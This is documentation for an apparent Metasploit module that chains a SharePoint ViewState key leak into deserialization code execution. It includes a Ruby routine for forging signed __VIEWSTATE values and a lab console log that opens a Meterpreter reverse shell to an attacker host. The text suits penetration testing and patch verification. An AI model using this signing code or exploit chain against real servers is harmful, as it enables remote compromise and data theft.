Vulnerable Application
Description
The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user-supplied data. An attacker can leverage this to leak sensitive information through rendered preview content. This module leaks the ViewState validation key and then uses it to sign a crafted serialized object that triggers code execution when the server deserializes it.
The check method is unauthenticated and determines whether the target is vulnerable from the version number the server reports. The exploit itself, however, requires authentication in order to trigger the vulnerability. See the HttpUsername option below for the permissions the account needs.
This vulnerability was patched in May of 2021.
Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.
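The description above compresses the second half of the attack into one sentence: once the validation key is known, the attacker can produce a __VIEWSTATE value that passes the server's MAC check and carries whatever serialized object they like. The following Ruby is an added example, not the module's own code and not Metasploit's ViewState mixin. It assumes the legacy ASP.NET MAC layout, where __VIEWSTATE is base64(data || HMAC(validation_key, data || modifier)) and the modifier is the 4-byte little-endian __VIEWSTATEGENERATOR value optionally followed by the page's ViewStateUserKey; the .NET 4.5 purpose-based mode derives a per-purpose key first and is not modelled here. The validation key is the one leaked in the scenario on this page; the generator value, the ViewStateUserKey handling, and the payload bytes are assumptions or constructed stand-ins.

```ruby
require 'openssl'

# Added example (not the Metasploit module's own code). Shows how a leaked
# ASP.NET validation key is enough to mint a ViewState the server accepts,
# under the legacy MAC scheme:
#   __VIEWSTATE = base64( data || HMAC(validation_key, data || modifier) )
VALIDATION_KEY_HEX = 'F894731BF335C2DAB04D70773B5F6BE55EE2C4052B671EE3C6785497A3D29A94'.freeze # leaked in the scenario below
EXAMPLE_GENERATOR  = 'CA0B0334'.freeze # assumed value; in practice read __VIEWSTATEGENERATOR from the target page

# The MAC modifier ties a ViewState to one page: the generator as a 32-bit
# little-endian integer, plus the ViewStateUserKey bytes if the page sets one.
def mac_modifier(generator_hex, viewstate_user_key = nil)
  modifier = [generator_hex.to_i(16)].pack('V')
  modifier << viewstate_user_key.encode('UTF-8').b if viewstate_user_key
  modifier
end

# Sign arbitrary serialized bytes so they pass the server's MAC check.
# `data` stands in for the serialized gadget chain; the MAC does not care what it is.
def sign_viewstate(data, key_hex:, generator_hex:, algo: 'sha256', viewstate_user_key: nil)
  key = [key_hex].pack('H*')
  mac = OpenSSL::HMAC.digest(algo, key, data.b + mac_modifier(generator_hex, viewstate_user_key))
  [data.b + mac].pack('m0') # 'm0' = strict base64, no line breaks
end

# Constant-time comparison so the check below does not leak MAC bytes by timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Mirror of the server-side check: returns the payload bytes on a valid MAC, nil otherwise.
# A wrong key, a different page (generator) or a tampered body all fail here.
def verify_viewstate(b64, key_hex:, generator_hex:, algo: 'sha256', viewstate_user_key: nil)
  raw = b64.unpack1('m0')
  mac_len = OpenSSL::Digest.new(algo).digest_length
  return nil if raw.bytesize <= mac_len
  data = raw[0, raw.bytesize - mac_len]
  mac  = raw[raw.bytesize - mac_len, mac_len]
  key = [key_hex].pack('H*')
  expected = OpenSSL::HMAC.digest(algo, key, data + mac_modifier(generator_hex, viewstate_user_key))
  secure_equal?(mac, expected) ? data : nil
end

if __FILE__ == $PROGRAM_NAME
  payload = 'constructed stand-in for a serialized gadget chain'.b # constructed, not a real gadget
  vs = sign_viewstate(payload, key_hex: VALIDATION_KEY_HEX, generator_hex: EXAMPLE_GENERATOR)
  puts "__VIEWSTATE=#{vs}"
  puts "accepted with leaked key: #{!verify_viewstate(vs, key_hex: VALIDATION_KEY_HEX, generator_hex: EXAMPLE_GENERATOR).nil?}"
  puts "accepted with wrong key:  #{!verify_viewstate(vs, key_hex: '00' * 32, generator_hex: EXAMPLE_GENERATOR).nil?}"
  puts "accepted for other page:  #{!verify_viewstate(vs, key_hex: VALIDATION_KEY_HEX, generator_hex: '00000000').nil?}"
end
```

The point the example makes is that the MAC protects integrity, not confidentiality: with the key in hand there is nothing left for the server to check, which is why the module can chain an information leak straight into deserialization. It also shows why a signed ViewState is page-specific (the generator is part of the MAC input) and why rotating the machine key after the May 2021 patch is part of cleanup: a key leaked before patching keeps signing valid payloads afterwards.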
Setup
Follow Microsoft's documentation.
Verification Steps
Targets
Windows Command
This executes a Windows command.
Windows Dropper
This uses a Windows dropper to execute code.
PowerShell Stager
This uses a PowerShell stager to execute code.
Options
HttpUsername
Set this to the SharePoint username. This user must have the SPBasePermissions.ManageLists permission on the targeted SharePoint site. By default, SharePoint users may create their own site, on which they will have this permission; however, this module does not create such a site automatically.
HttpPassword
Set this to the SharePoint password.
VALIDATION_KEY
Set this to the ViewState validation key if you already have it. When it is not set, the module leaks the key from the target before building the payload.
COOKIE
Set this to a SharePoint session cookie if you have one. This is primarily useful for forms-based authentication.
SP_LIST
Set this to the title of any valid SPList on the targeted SharePoint site. The Documents list is typically a safe option. The available lists can be seen on the /_layouts/15/viewlsts.aspx page.
Scenarios
SharePoint 2019 on Windows Server 2016
msf6 exploit(windows/http/sharepoint_unsafe_control) > set RHOSTS 192.168.159.46
RHOSTS => 192.168.159.46
msf6 exploit(windows/http/sharepoint_unsafe_control) > set VHOST shrpnt2019
VHOST => shrpnt2019
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpUsername aliddle
HttpUsername => aliddle
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpPassword Password1
HttpPassword => Password1
msf6 exploit(windows/http/sharepoint_unsafe_control) > check
[*] 192.168.159.46:80 - The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
msf6 exploit(windows/http/sharepoint_unsafe_control) > exploit
[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Leaking the ViewState validation key...
[+] ViewState validation key: F894731BF335C2DAB04D70773B5F6BE55EE2C4052B671EE3C6785497A3D29A94
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] https://192.168.159.128:8443 handling request from 192.168.159.46; (UUID: a5re3jes) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 127.0.0.1) at 2021-06-08 15:08:59 -0400
meterpreter > getuid
Server username: SHRPNT\SharePoint
meterpreter > sysinfo
Computer : SHRPNT2019
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : SHRPNT
Logged On Users : 11
Meterpreter : x64/windows
meterpreter >